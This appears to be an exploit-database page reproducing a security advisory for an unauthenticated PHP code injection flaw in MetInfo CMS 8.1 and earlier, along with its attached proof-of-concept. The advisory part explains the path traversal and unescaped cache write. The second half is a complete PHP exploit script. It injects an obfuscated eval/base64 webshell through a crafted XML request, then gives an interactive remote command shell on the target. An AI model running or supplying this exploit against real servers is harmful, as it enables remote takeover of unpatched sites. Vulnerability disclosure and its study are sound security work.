## https://sploitus.com/exploit?id=PACKETSTORM:218222
---------------------------------------------------------------------------
MetInfo CMS <= 8.1 (weixinreply.class.php) PHP Code Injection Vulnerability
---------------------------------------------------------------------------
[-] Software Link:
https://www.metinfo.cn
[-] Affected Versions:
Versions 7.9, 8.0, and 8.1.
[-] Vulnerability Description:
The vulnerable code is located into the
/app/system/weixin/include/class/weixinreply.class.php script.
Specifically, within the weixinreply::wxAdminLogin() method:
149. public function wxAdminLogin($data = array(),$code = '')
150. {
151. global $_M;
152. $weixinapi = load::mod_class('weixin/weixinapi','new');
153. $login_code = cache::get("weixin/".$code);
154. if ($login_code) {
155. cache::put("weixin/".$login_code,$data['FromUserName']);
156. }
157. return;
158. }
User input passed through the "EventKey" and "FromUserName" XML tags
from the HTTP request body when dispatching weixin API requests is not
properly sanitized before being used in a call to the cache::get() and
cache::put() methods respectively.
Specifically, the $code parameter may include Path Traversal
sequences, making the cache::get() method into including arbitrary PHP
files. This can be abused to set the $login_code variable to the
"Array" string by including an arbitrary cache file. Subsequently, the
cache::put() method will write the "FromUserName" parameter into the
/cache/weixin/Array.php file, embedding it within double quotes:
30. public static function put($file, $data, $type = 'php')
31. {
32. global $_M;
33.
34. load::sys_func('file');
35. $save = PATH_CACHE . $file . '.' . $type;
36. makefile($save);
37. #$data = str_replace(array("\"", "\\"), array("\\\"",
"\\\\"), $data);
38. if (!is_array($data)) {
39. file_put_contents($save, "<?php\ndefined('IN_MET') or
exit('No permission');\n\$cache=\"{$data}\";\n?>");
40. } else {
41. $info = var_export($data, true);
42. $info = "<?php\ndefined('IN_MET') or exit('No
permission');\n\$cache = {$info};\n?>";
43. file_put_contents($save, $info);
44. }
45. }
This can be exploited by remote, unauthenticated attackers to inject
and execute arbitrary PHP code by abusing PHP's complex curly syntax,
leading to unauthenticated Remote Code Execution (RCE).
NOTE: when MetInfo is running on non-Windows servers, successful
exploitation of this vulnerability requires the /cache/weixin/
directory to exist, which is created when installing and configuring
the official WeChat plugin.
[-] Proof of Concept:
https://karmainsecurity.com/pocs/CVE-2026-29014.php
[-] Solution:
No official solution is currently available.
[-] Disclosure Timeline:
[26/02/2026] - Vendor contacted through several @metinfo.cn and
@mituo.cn email addresses, no response
[07/03/2026] - Tried to reach out to the vendor again, no response
[28/03/2026] - Tried to reach out to the vendor once again, no response
[29/03/2026] - Tried to reach out to the vendor through Weibo, no response
[30/03/2026] - CVE identifier requested
[31/03/2026] - CVE identifier assigned
[01/04/2026] - Public disclosure
[-] CVE Reference:
CVE-2026-29014 has been assigned to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
https://karmainsecurity.com/KIS-2026-06
--- packet storm attached poc below: ---
<?php
/*
---------------------------------------------------------------------------
MetInfo CMS <= 8.1 (weixinreply.class.php) PHP Code Injection Vulnerability
---------------------------------------------------------------------------
author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: https://www.metinfo.cn
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] Original Advisory:
https://karmainsecurity.com/KIS-2026-06
*/
set_time_limit(0);
error_reporting(E_ERROR);
print "\n+----------------------------------------------------------+";
print "\n| MetInfo CMS <= 8.1 Remote Code Execution Exploit by EgiX |";
print "\n+----------------------------------------------------------+\n";
if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");
if ($argc != 2) die("\nUsage: php {$argv[0]} <URL>\n\n");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "{$argv[1]}app/system/entrance.php?n=include&m=module&c=weixin&a=doapi");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
//curl_setopt($ch, CURLOPT_PROXY, "http://127.0.0.1:8080");
print "\n[+] Injecting PHP webshell\n";
$payload = '<x><MsgType>event</MsgType><Event>SCAN</Event><EventKey>adminlogin&../config/tables</EventKey><FromUserName>{${eval(base64_decode($_SERVER[chr(72).chr(84).chr(84).chr(80).chr(95).chr(67)]))}}.{${die()}}</FromUserName></x>';
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
if (!preg_match("/success/", curl_exec($ch))) die("[-] Injection failed!\n\n");
print "[+] Launching webshell\n";
$phpcode = "chdir('../..'); print '_____'; passthru(base64_decode('%s')); print '_____';";
$payload = '<x><MsgType>event</MsgType><Event>SCAN</Event><EventKey>adminlogin&Array</EventKey></x>';
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
while(1)
{
print "\nmetinfo-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: " . base64_encode(sprintf($phpcode, base64_encode($cmd)))]);
preg_match("/_____(.*)_____/s", curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
}